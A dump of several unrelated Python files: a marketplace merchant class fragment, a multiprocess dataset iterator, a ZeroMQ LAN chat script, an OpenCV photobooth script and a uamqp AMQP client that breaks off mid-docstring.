product = order.product
shipping_time = {
'standard': self.settings['shipping'],
'prime': self.settings['primeShipping']
}
offer = Offer.from_product(product, 0, shipping_time)
offer.merchant_id = self.merchant_id
offer.price = self.calculate_price(offer.offer_id, market_situation + [offer])
self.marketplace.add_offer(offer)
def sold_offer(self, offer: SoldOffer) -> None:
"""
This method is called whenever the merchant sells a product.
"""
print('Product sold')
def start(self):
self.state = 'running'
def stop(self):
self.state = 'stopping'
def update_settings(self, new_settings: dict) -> None:
for key, value in new_settings.items():
if key in self.settings:
# Cast value type to the type that is already in the settings dictionary
value = type(self.settings[key])(value)
self.settings[key] = value
def start_server(self, port):
server = MerchantServer(self)
thread = threading.Thread(target=server.app.run, kwargs={'host': '0.0.0.0', 'port': port})
thread.daemon = True
thread.start()
return thread
@abstractmethod
def calculate_price(self, offer_id: int, market_situation: List[Offer]) -> float:
"""
Calculate the price for the offer indicated by 'offer_id' given the current market situation.
The offer id is guaranteed to be in the market situation.
"""
pass
|
multiprocess_iterator.py
|
from __future__ import division
import datetime
import multiprocessing
from multiprocessing import sharedctypes # type: ignore
import signal
import sys
import threading
import warnings
import numpy
import six
from pytorch_trainer.dataset import iterator
from pytorch_trainer.iterators import _statemachine
from pytorch_trainer.iterators.order_samplers import ShuffleOrderSampler
_response_time = 0.1
def _raise_timeout_warning():
warnings.warn(
'Stalled dataset is detected. '
'See the documentation of MultiprocessIterator for common causes and '
'workarounds:\n'
'https://docs.chainer.org/en/stable/reference/generated/'
'pytorch_trainer.iterators.MultiprocessIterator.html',
MultiprocessIterator.TimeoutWarning)
class MultiprocessIterator(iterator.Iterator):
"""Dataset iterator that loads examples in parallel.
This is an implementation of :class:`~pytorch_trainer.dataset.Iterator` that loads
examples with worker processes. It uses the standard :mod:`multiprocessing`
module to parallelize the loading. The dataset is sent to the worker
processes in the standard way using pickle.
Note that this iterator effectively prefetches the examples for the next
batch asynchronously after the current batch is returned.
This iterator saves ``-1`` instead of ``None`` in snapshots since some
serializers do not support ``None``.
.. note::
When you are using OpenCV somewhere in your code and the
``MultiprocessIterator`` is used in the training code, the
training loop may get stuck at some point. In such situation,
there are several workarounds to prevent the process got stuck.
1. Set the environment variable as follows: ``OMP_NUM_THREADS=1``
2. Add ``cv2.setNumThreads(0)`` right after ``import cv2`` in your
training script.
3. Use :class:`~pytorch_trainer.iterators.MultithreadIterator` instead of
``MultiprocessIterator``.
Args:
dataset (~pytorch_trainer.dataset.Dataset): Dataset to iterate.
batch_size (int): Number of examples within each batch.
repeat (bool): If ``True``, it infinitely loops over the dataset.
Otherwise, it stops iteration at the end of the first epoch.
shuffle (bool): If ``True``, the order of examples is shuffled at the
beginning of each epoch. Otherwise, examples are extracted in the
order of indexes. If ``None`` and no ``order_sampler`` is given,
the behavior is the same as the case with ``shuffle=True``.
n_processes (int): Number of worker processes. The number of CPUs is
used by default.
n_prefetch (int): Number of prefetch batches.
shared_mem (int): The size of using shared memory per data.
If ``None``, size is adjusted automatically.
dataset_timeout (float): :class:`MultiprocessIterator.TimeoutWarning`
will be issued after this time in seconds elapsed in each dataset
realization. ``None`` to disable the warning. You can turn this
warning into an error by using :func:`warnings.simplefilter`::
warnings.simplefilter(
'error',
pytorch_trainer.iterators.MultiprocessIterator.TimeoutWarning)
order_sampler (callable): A callable that generates the order
of the indices to sample in the next epoch when a epoch finishes.
This function should take two arguments: the current order
and the current position of the iterator.
This should return the next order. The size of the order
should remain constant.
This option cannot be used when ``shuffle`` is not ``None``.
maxtasksperchild (int): Number of tasks a worker of prefetch process
can complete before it will exit and be replaced with a fresh
worker process, to enable unused resources to be freed. If
``None``, worker processes will live as long as the pool.
"""
class TimeoutWarning(RuntimeWarning):
pass
_interruption_testing = False # for testing
_finalized = False
_prefetch_loop = None
_comm = None
def __init__(self, dataset, batch_size, repeat=True, shuffle=None,
n_processes=None, n_prefetch=1, shared_mem=None,
order_sampler=None, dataset_timeout=30.0,
maxtasksperchild=None):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes or multiprocessing.cpu_count()
self.n_prefetch = max(n_prefetch, 1)
self.shared_mem = shared_mem
self.dataset_timeout = dataset_timeout
self._maxtasksperchild = maxtasksperchild
if self.shuffle is not None:
if order_sampler is not None:
raise ValueError('`shuffle` is not `None` and a custom '
'`order_sampler` is set. Please set '
'`shuffle` to `None` to use the custom '
'order sampler.')
else:
if self.shuffle:
order_sampler = ShuffleOrderSampler()
else:
if order_sampler is None:
order_sampler = ShuffleOrderSampler()
self.order_sampler = order_sampler
self._initialize_loop()
def _initialize_loop(self):
self._comm = _Communicator(self.n_prefetch, self.dataset_timeout)
self.reset()
self._prefetch_loop = _PrefetchLoop(
self.dataset, self.batch_size, self.repeat,
self.n_processes, self.n_prefetch, self.shared_mem,
self._comm, self.order_sampler,
self._interruption_testing, self._maxtasksperchild)
# defer launching prefetch thread until creating the worker pool,
# not to leave a background thread in forked processes.
def __next__(self):
measure_mode = False
if self._prefetch_loop.thread is None:
if self._prefetch_loop.measure_required():
measure_mode = True
batch, state = self._prefetch_loop.measure(
self.dataset_timeout)
self._prefetch_loop.launch_thread()
if not measure_mode:
batch, state = self._comm.get()
self._previous_epoch_detail = self.epoch_detail
self._state = state
if batch is None:
raise StopIteration
else:
return batch
next = __next__
def finalize(self):
if self._finalized:
return
if self._comm is not None:
self._comm.terminate()
if self._prefetch_loop is not None:
self._prefetch_loop.terminate()
self._comm = None
self._prefetch_loop = None
self._finalized = True
def __copy__(self):
# This function is implemented for backward compatibility.
# Please use `reset` normally.
other = MultiprocessIterator(
self.dataset, self.batch_size, self.repeat, shuffle=None,
n_processes=self.n_processes, n_prefetch=self.n_prefetch,
shared_mem=self.shared_mem, order_sampler=self.order_sampler)
other._reset_state(self.current_position, self.epoch,
self.is_new_epoch, self._state.order)
other._previous_epoch_detail = self._previous_epoch_detail
return other
@property
def current_position(self):
return self._state.current_position
@property
def epoch(self):
return self._state.epoch
@property
def is_new_epoch(self):
return self._state.is_new_epoch
@property
def epoch_detail(self):
return self.epoch + self.current_position / self._epoch_size
@property
def previous_epoch_detail(self):
if self._previous_epoch_detail < 0:
return None
return self._previous_epoch_detail
def state_dict(self):
state_dict = {
'current_position': self.current_position,
'epoch': self.epoch,
'is_new_epoch': self.is_new_epoch,
}
order = self._state.order.copy()
state_dict['order'] = order
try:
state_dict['previous_epoch_detail'] = self._previous_epoch_detail
except KeyError:
pass
return state_dict
def load_state_dict(self, state_dict):
current_position = state_dict['current_position']
epoch = state_dict['epoch']
is_new_epoch = state_dict['is_new_epoch']
order = self._state.order
if order is not None:
order = state_dict['order']
self._reset_state(
current_position, epoch, is_new_epoch, order)
try:
self._previous_epoch_detail = state_dict['previous_epoch_detail']
except KeyError:
# guess previous_epoch_detail for older version
self._previous_epoch_detail = self.epoch + \
(self.current_position - self.batch_size) / self._epoch_size
if self.epoch_detail > 0:
self._previous_epoch_detail = max(
self._previous_epoch_detail, 0.)
else:
self._previous_epoch_detail = -1.
def reset(self):
if self.order_sampler is None:
order = None
else:
order = self.order_sampler(numpy.arange(len(self.dataset)), 0)
self._reset_state(0, 0, False, order)
self._previous_epoch_detail = -1.
def _reset_state(self, current_position, epoch, is_new_epoch, order):
if self._finalized:
raise NotImplementedError(
'Reset of finalized MultiProcessIterator is currently not '
'supported.')
self._state = _statemachine.IteratorState(
current_position, epoch, is_new_epoch, order)
self._comm.reset(self._state)
@property
def _epoch_size(self):
order = self._state.order
if order is None:
epoch_size = len(self.dataset)
else:
epoch_size = len(order)
return epoch_size
def __getstate__(self):
# We trick the serializer to fill a dict for us
# this allows us to use the same code for both
# pytorch_trainer and pickle serializers
state = self.state_dict()
self._reset_state(self.current_position, self.epoch,
self.is_new_epoch, state['order'])
# Unpickling resets the instance without calling __init__
# Chainer serializers dumps the state in an existing
# object hence we need to save the initial parameters too
init = self.__dict__.copy()
del init['_comm']
del init['_state']
del init['_prefetch_loop']
# TODO(ecastill): When pickling this object there is the risk to copy
# the entire dataset. If the dataset is entirely in memory
# it can be duplicated when spawning new processes.
state['init'] = init
return state
def __setstate__(self, state):
self.__dict__.update(state['init'])
self._initialize_loop()
# Iterator state is restored after initialization
self._reset_state(state['current_position'], state['epoch'],
state['is_new_epoch'], state['order'])
self._previous_epoch_detail = state['previous_epoch_detail']
class _Communicator(object):
STATUS_CONTINUE = 0
STATUS_RESET = 1
STATUS_TERMINATE = 2
def __init__(self, n_prefetch, dataset_timeout):
self.n_prefetch = n_prefetch
self.dataset_timeout = dataset_timeout
self._lock = threading.Lock()
self._not_empty_cond = threading.Condition(self._lock)
self._not_full_cond = threading.Condition(self._lock)
self._batch_queue = []
self._status = _Communicator.STATUS_CONTINUE
self._reset_count = 0
@property
def is_terminated(self):
with self._lock:
return self._status == _Communicator.STATUS_TERMINATE
# called from iterator
def get(self):
with self._lock:
start = datetime.datetime.now()
while not self._batch_queue:
self._not_empty_cond.wait(_response_time)
dt = datetime.datetime.now() - start
if (self.dataset_timeout is not None
and dt > datetime.timedelta(
seconds=self.dataset_timeout)):
_raise_timeout_warning()
batch, prefetch_state = self._batch_queue.pop(0)
self._not_full_cond.notify()
return batch, prefetch_state
# called from iterator
def reset(self, prefetch_state):
with self._lock:
self._status = _Communicator.STATUS_RESET
self._prefetch_state = prefetch_state
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from iterator
def terminate(self):
with self._lock:
self._status = _Communicator.STATUS_TERMINATE
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from thread
def check(self):
with self._lock:
status = self._status
self._status = _Communicator.STATUS_CONTINUE
prefetch_state = None
if status == _Communicator.STATUS_RESET:
prefetch_state = self._prefetch_state
return status, prefetch_state, self._reset_count
# called from thread
def put(self, batch, prefetch_state, reset_count):
with self._lock:
if len(self._batch_queue) == self.n_prefetch:
self._not_full_cond.wait()
if reset_count == self._reset_count:
self._batch_queue.append((batch, prefetch_state))
self._not_empty_cond.notify()
class _PrefetchLoop(object):
_thread = None
_pool = None
_terminating = False
def __init__(self, dataset, batch_size, repeat,
n_processes, n_prefetch, mem_size, comm,
order_sampler,
_interruption_testing, maxtasksperchild):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.n_processes = n_processes
self.mem_size = mem_size
self._comm = comm
self.order_sampler = order_sampler
self.maxtasksperchild = maxtasksperchild
self._allocate_shared_memory()
self._interruption_testing = _interruption_testing
def terminate(self):
self._terminating = True
# Terminate the thread first because it depends on the pool.
if self._thread is not None:
while self._thread.is_alive():
self._thread.join(_response_time)
if self._pool is not None:
self._pool.terminate()
self._thread = None
self._pool = None
@property
def thread(self):
return self._thread
def measure_required(self):
return self.mem_size is None
def measure(self, dataset_timeout):
# dataset_timeout: timeout in seconds or None
status, prefetch_state, _ = self._comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
self.prefetch_state, indices = _statemachine.iterator_statemachine(
self.prefetch_state, self.batch_size, self.repeat,
self.order_sampler, len(self.dataset))
if indices is None: # stop iteration
batch = None
else:
batch_ret = [None]
def fetch_batch():
batch_ret[0] = [self.dataset[idx] for idx in indices]
if dataset_timeout is None:
# Timeout is not set: fetch synchronously
fetch_batch()
else:
# Timeout is set: fetch asynchronously and watch for timeout
thr = threading.Thread(target=fetch_batch)
thr.daemon = True
thr.start()
thr.join(dataset_timeout)
if thr.is_alive():
_raise_timeout_warning()
thr.join()
batch = batch_ret[0]
self.mem_size = max(map(_measure, batch))
self._allocate_shared_memory()
return batch, self.prefetch_state
def _allocate_shared_memory(self):
if self.measure_required():
self.mem_bulk = None
else:
self.mem_bulk = \
sharedctypes.RawArray('b', self.batch_size * self.mem_size)
def launch_thread(self):
self._pool = multiprocessing.Pool(
processes=self.n_processes,
initializer=_fetch_setup,
initargs=(self.dataset, self.mem_size, self.mem_bulk),
maxtasksperchild=self.maxtasksperchild)
if self._interruption_testing:
pids = self._pool.map(_report_pid, range(self.n_processes))
print(' '.join(map(str, pids)))
sys.stdout.flush()
thread = threading.Thread(target=self._run, name='prefetch_loop')
thread.setDaemon(True)
thread.start()
self._thread = thread
return thread
def _run(self):
# The entry routine of the prefetch thread.
alive = True
try:
while alive:
if self._terminating:
break
alive = self._task()
finally:
self._pool.close()
self._pool.join()
def _task(self):
# Do a single task in the prefetch thread.
# Returns a bool indicating whether the loop should continue running.
status, prefetch_state, reset_count = self._comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
elif status == _Communicator.STATUS_TERMINATE:
return False # stop loop
self.prefetch_state, indices = _statemachine.iterator_statemachine(
self.prefetch_state, self.batch_size, self.repeat,
self.order_sampler, len(self.dataset))
if indices is None: # stop iteration
batch = None
else:
future = self._pool.map_async(_fetch_run, enumerate(indices))
while True:
try:
data_all = future.get(_response_time)
except multiprocessing.TimeoutError:
if self._comm.is_terminated:
return False
else:
break
batch = [_unpack(data, self.mem_bulk) for data in data_all]
self._comm.put(batch, self.prefetch_state, reset_count)
return True
# Using `parameterized` function (e.g. bound method) with Pool is tricky due to
# restrictions imposed by Pickle. Picklable types differ across versions.
# Just using top-level function with globals seems to be safest.
# it doesn't mean thread safety broken or global variables visible;
# notice that each process uses different address space.
# To make static linter happy, we first initialize global variables.
_fetch_dataset = None
_fetch_mem_size = None
_fetch_mem_bulk = None
def _fetch_setup(dataset, mem_size, mem_bulk):
global _fetch_dataset, _fetch_mem_size, _fetch_mem_bulk
signal.signal(signal.SIGINT, signal.SIG_IGN)
_fetch_dataset = dataset
_fetch_mem_size = mem_size
_fetch_mem_bulk = mem_bulk
def _fetch_run(inputs):
i, index = inputs
data = _fetch_dataset[index]
if _fetch_mem_bulk is not None:
offset = i * _fetch_mem_size
limit = offset + _fetch_mem_size
data = _pack(data, _fetch_mem_bulk, offset, limit)
return data
def _report_pid(_): # for testing
return multiprocessing.current_process().pid
class _PackedNdarray(object):
def __init__(self, array, mem, offset):
self.shape = array.shape
self.dtype = array.dtype
self.nbytes = array.nbytes
self.size = array.size
self.offset = offset
total = self.offset + self.nbytes
if total > len(mem):
raise ValueError(
'Shared memory size is too small. expect:{}, actual:{}'.format(
total, len(mem)))
target = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
target[...] = array.ravel()
def unpack(self, mem):
ret = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
ret = ret.reshape(self.shape).copy()
return ret
def _measure(data):
expect = 0
t = type(data)
if t is tuple or t is list or t is dict:
for v in data:
if isinstance(v, numpy.ndarray):
expect += v.nbytes
return expect
def _pack(data, mem, offset, limit):
if len(mem) == 0:
return data
t = type(data)
over = False
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret[k] = v
data = ret
elif t is numpy.ndarray:
if data.nbytes + offset > limit:
over = True
else:
data = _PackedNdarray(data, mem, offset)
offset += data.nbytes
if over:
expect = _measure(data)
warnings.warn(
'Shared memory size is too small.\n' +
'Please set shared_mem option for MultiprocessIterator.\n' +
'Expect shared memory size: {} bytes.\n'.format(expect) +
'Actual shared memory size: {} bytes.'.format(limit - offset),
UserWarning)
return data
def _unpack(data, mem):
if len(mem) == 0:
return data
t = type(data)
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret[k] = v
data = ret
elif t is _PackedNdarray:
data = data.unpack(mem)
return data
|
p2p.py
|
#Code definitely doesn't work. Will deliver free Canes on Monday for extra credit
try:
raw_input
except NameError:
raw_input = input
import argparse
import os
from threading import Thread
# dependency, not in stdlib
from netifaces import interfaces, ifaddresses, AF_INET
import zmq
def listen(masked):
"""listen for messages
masked is the first three parts of an IP address:
192.168.1
The socket will connect to all of X.Y.Z.{1-254}.
"""
ctx = zmq.Context.instance()
listener = ctx.socket(zmq.SUB)
for last in range(1, 255):
listener.connect("tcp://{0}.{1}:9000".format(masked, last))
listener.setsockopt(zmq.SUBSCRIBE, b'')
while True:
try:
print(listener.recv_string())
except (KeyboardInterrupt, zmq.ContextTerminated):
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument("interface", type=str, help="the network interface",
choices=interfaces(),
)
parser.add_argument("user", type=str, default=os.environ['USER'],
nargs='?',
help="Your username",
)
args = parser.parse_args()
inet = ifaddresses(args.interface)[AF_INET]
addr = inet[0]['addr']
masked = addr.rsplit('.', 1)[0]
ctx = zmq.Context.instance()
listen_thread = Thread(target=listen, args=(masked,))
listen_thread.start()
bcast = ctx.socket(zmq.PUB)
bcast.bind("tcp://%s:9000" % args.interface)
print("starting chat on %s:9000 (%s.*)" % (args.interface, masked))
while True:
try:
msg = raw_input()
bcast.send_string("%s: %s" % (args.user, msg))
except KeyboardInterrupt:
break
bcast.close(linger=0)
ctx.term()
if __name__ == '__main__':
main()
|
photobooth.py
|
import cv2
import cv
import numpy as np
import serial #cargamos la libreria serial
import threading
import time
#Iniciamos la camara
captura=cv2.VideoCapture(0)
#Iniciamos la comunicacion serial
#ser = serial.Serial('/dev/ttyACM0', 9600)
def showVideo(cap):
key=0
print "hola"
while(key!=27):
print "hola2"
flag, frame = cap.read()
print "frame"
cv2.putText(frame,"3", (100,80), cv2.FONT_HERSHEY_SIMPLEX, 2, 255)
print "lalla"
time.sleep(1)
cv2.imshow('PON UNA POSE GUAPA!', frame)
time.sleep(1)
key = cv2.waitKey(5) & 0xFF
thread = threading.Thread(target=showVideo, args=(captura,))
key=0
numSnapshot=0
first=True
while(key!=27):
key = cv2.waitKey(5) & 0xFF
if first:
first=False
thread.start()
#if ser.read()=='s':
# print "recibo"
# flag, frame = captura.read()
#if flag:
# cv2.imshow('ESTA ES TU FOTO!', frame)
# cv2.imwrite("%d.png"%numSnapshot, frame)
#numSnapshot+=1
#else:
# print "Try again"
cv2.destroyAllWindows()
#thread.exit()
|
client.py
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=too-many-lines
import logging
import threading
import time
import uuid
from uamqp import (Connection, Session, address, authentication, c_uamqp,
compat, constants, errors, receiver, sender)
from uamqp.constants import TransportType
_logger = logging.getLogger(__name__)
class AMQPClient(object):
"""An AMQP client.
:param remote_address: The AMQP endpoint to connect to. This could be a send target
or a receive source.
:type remote_address: str, bytes or ~uamqp.address.Address
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, remote_address, auth=None, client_name=None, debug=False,
error_policy=None, keep_alive_interval=None, **kwargs):
self._cbs = None
self._encoding = kwargs.pop('encoding', None) or 'UTF-8'
self._transport_type = kwargs.pop('transport_type', None) or TransportType.Amqp
self._http_proxy = kwargs.pop('http_proxy', None)
self._remote_address = remote_address if isinstance(remote_address, address.Address) \
else address.Address(remote_address)
self._hostname = self._remote_address.hostname
if not auth:
username = self._remote_address.username
password = self._remote_address.password
if username and password:
username = compat.unquote_plus(username)
password = compat.unquote_plus(password)
auth = authentication.SASLPlain(
self._hostname, username, password,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._auth = auth if auth else authentication.SASLAnonymous(
self._hostname,
http_proxy=self._http_proxy,
transport_type=self._transport_type)
self._name = client_name if client_name else str(uuid.uuid4())
self._debug_trace = debug
self._counter = c_uamqp.TickCounter()
self._shutdown = False
self._connection = None
self._ext_connection = False
self._session = None
self._backoff = 0
self._error_policy = error_policy or errors.ErrorPolicy()
self._keep_alive_interval = int(keep_alive_interval) if keep_alive_interval else 0
self._keep_alive_thread = None
# Connection settings
self._max_frame_size = kwargs.pop('max_frame_size', None) or constants.MAX_FRAME_SIZE_BYTES
self._channel_max = kwargs.pop('channel_max', None)
self._idle_timeout = kwargs.pop('idle_timeout', None)
self._properties = kwargs.pop('properties', None)
self._remote_idle_timeout_empty_frame_send_ratio = kwargs.pop(
'remote_idle_timeout_empty_frame_send_ratio', None)
# Session settings
self._outgoing_window = kwargs.pop('outgoing_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._incoming_window = kwargs.pop('incoming_window', None) or constants.MAX_FRAME_SIZE_BYTES
self._handle_max = kwargs.pop('handle_max', None)
self._on_attach = kwargs.pop('on_attach', None)
# Link settings
self._send_settle_mode = kwargs.pop('send_settle_mode', None) or constants.SenderSettleMode.Unsettled
self._receive_settle_mode = kwargs.pop('receive_settle_mode', None) or constants.ReceiverSettleMode.PeekLock
self._desired_capabilities = kwargs.pop('desired_capabilities', None)
# AMQP object settings
self.message_handler = None
self.connection_type = Connection
self.session_type = Session
if kwargs:
raise ValueError("Received unrecognized kwargs: {}".format(", ".join(kwargs.keys())))
def __enter__(self):
"""Run Client in a context manager."""
self.open()
return self
def __exit__(self, *args):
"""Close and destroy Client on exiting a context manager."""
self.close()
def _keep_alive(self):
start_time = self._counter.get_current_ms()
try:
while self._connection and not self._shutdown:
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - start_time)/1000
if elapsed_time >= self._keep_alive_interval:
_logger.debug("Keeping %r connection alive.", self.__class__.__name__)
self._connection.work()
start_time = current_time
time.sleep(1)
except Exception as e: # pylint: disable=broad-except
_logger.info("Connection keep-alive for %r failed: %r.", self.__class__.__name__, e)
def _client_ready(self): # pylint: disable=no-self-use
"""Determine whether the client is ready to start sending and/or
receiving messages. To be ready, the connection must be open and
authentication complete.
:rtype: bool
"""
return True
def _client_run(self):
"""Perform a single Connection iteration."""
self._connection.work()
def _redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
# pylint: disable=protected-access
if not self._cbs:
_logger.debug("Closing non-CBS session.")
self._session.destroy()
self._session = None
self._auth = auth
self._hostname = self._remote_address.hostname
self._connection.redirect(redirect, auth)
self._build_session()
def _build_session(self):
"""Build self._session based on current self.connection.
"""
if not self._cbs and isinstance(self._auth, authentication.CBSAuthMixin):
self._cbs = self._auth.create_authenticator(
self._connection,
debug=self._debug_trace,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
self._session = self._auth._session # pylint: disable=protected-access
elif self._cbs:
self._session = self._auth._session # pylint: disable=protected-access
else:
self._session = self.session_type(
self._connection,
incoming_window=self._incoming_window,
outgoing_window=self._outgoing_window,
handle_max=self._handle_max,
on_attach=self._on_attach)
def open(self, connection=None):
"""Open the client. The client can create a new Connection
or an existing Connection can be passed in. This existing Connection
may have an existing CBS authentication Session, which will be
used for this client as well. Otherwise a new Session will be
created.
:param connection: An existing Connection that may be shared between
multiple clients.
:type connetion: ~uamqp.connection.Connection
"""
# pylint: disable=protected-access
if self._session:
return # already open.
_logger.debug("Opening client connection.")
try:
if connection:
_logger.debug("Using existing connection.")
self._auth = connection.auth
self._ext_connection = True
connection.lock()
self._connection = connection or self.connection_type(
self._hostname,
self._auth,
container_id=self._name,
max_frame_size=self._max_frame_size,
channel_max=self._channel_max,
idle_timeout=self._idle_timeout,
properties=self._properties,
remote_idle_timeout_empty_frame_send_ratio=self._remote_idle_timeout_empty_frame_send_ratio,
error_policy=self._error_policy,
debug=self._debug_trace,
encoding=self._encoding)
self._build_session()
if self._keep_alive_interval:
self._keep_alive_thread = threading.Thread(target=self._keep_alive)
self._keep_alive_thread.start()
finally:
if self._ext_connection:
connection.release()
def close(self):
"""Close the client. This includes closing the Session
and CBS authentication layer as well as the Connection.
If the client was opened using an external Connection,
this will be left intact.
No further messages can be sent or received and the client
cannot be re-opened.
All pending, unsent messages will remain uncleared to allow
them to be inspected and queued to a new client.
"""
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = True
if self._keep_alive_thread:
self._keep_alive_thread.join()
self._keep_alive_thread = None
if not self._session:
return # already closed.
if not self._cbs:
_logger.debug("Closing non-CBS session.")
self._session.destroy()
else:
_logger.debug("CBS close authenticator.")
self._auth.close_authenticator()
self._cbs = None
self._session = None
if not self._ext_connection:
_logger.debug("Closing exclusive connection.")
self._connection.destroy()
else:
_logger.debug("Shared connection remaining open.")
self._connection = None
def mgmt_request(self, message, operation, op_type=None, node=None, callback=None, **kwargs):
"""Run a request/response operation. These are frequently used for management
tasks against a $management node, however any node name can be specified
and the available options will depend on the target service.
:param message: The message to send in the management request.
:type message: ~uamqp.message.Message
:param operation: The type of operation to be performed. This value will
be service-specific, but common values include READ, CREATE and UPDATE.
This value will be added as an application property on the message.
:type operation: bytes
:param op_type: The type on which to carry out the operation. This will
be specific to the entities of the service. This value will be added as
an application property on the message.
:type op_type: bytes
:param node: The target node. Default is `b"$management"`.
:type node: bytes
:param timeout: Provide an optional timeout in milliseconds within which a response
to the management request must be received.
:type timeout: float
:param callback: The function to process the returned parameters of the management
request including status code and a description if available. This can be used
to reformat the response or raise an error based on content. The function must
take 3 arguments - status code, response message and description.
:type callback: ~callable[int, bytes, ~uamqp.message.Message]
:param status_code_field: Provide an alternate name for the status code in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusCode"`.
:type status_code_field: bytes
:param description_fields: Provide an alternate name for the description in the
response body which can vary between services due to the spec still being in draft.
The default is `b"statusDescription"`.
:type description_fields: bytes
:rtype: ~uamqp.message.Message
"""
while not self.auth_complete():
time.sleep(0.05)
response = self._session.mgmt_request(
message,
operation,
op_type=op_type,
node=node,
callback=callback,
encoding=self._encoding,
debug=self._debug_trace,
**kwargs)
return response
def auth_complete(self):
"""Whether the authentication handshake is complete during
connection initialization.
:rtype: bool
"""
timeout = False
auth_in_progress = False
if self._cbs:
timeout, auth_in_progress = self._auth.handle_token()
if timeout is None and auth_in_progress is None:
_logger.debug("No work done.")
return False
if timeout:
raise compat.TimeoutException("Authorization timeout.")
if auth_in_progress:
self._connection.work()
return False
return True
def client_ready(self):
"""
Whether the handler has completed all start up processes such as
establishing the connection, session, link and authentication, and
is not ready to process messages.
:rtype: bool
"""
if not self.auth_complete():
return False
if not self._client_ready():
self._connection.work()
return False
return True
def do_work(self):
"""Run a single connection iteration.
This will return `True` if the connection is still open
and ready to be used for further work, or `False` if it needs
to be shut down.
:rtype: bool
:raises: TimeoutError or ~uamqp.errors.ClientTimeout if CBS authentication timeout reached.
"""
if self._shutdown:
return False
if not self.client_ready():
return True
return self._client_run()
class SendClient(AMQPClient):
"""An AMQP client for sending messages.
:param target: The target AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Target object.
:type target: str, bytes or ~uamqp.address.Target
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
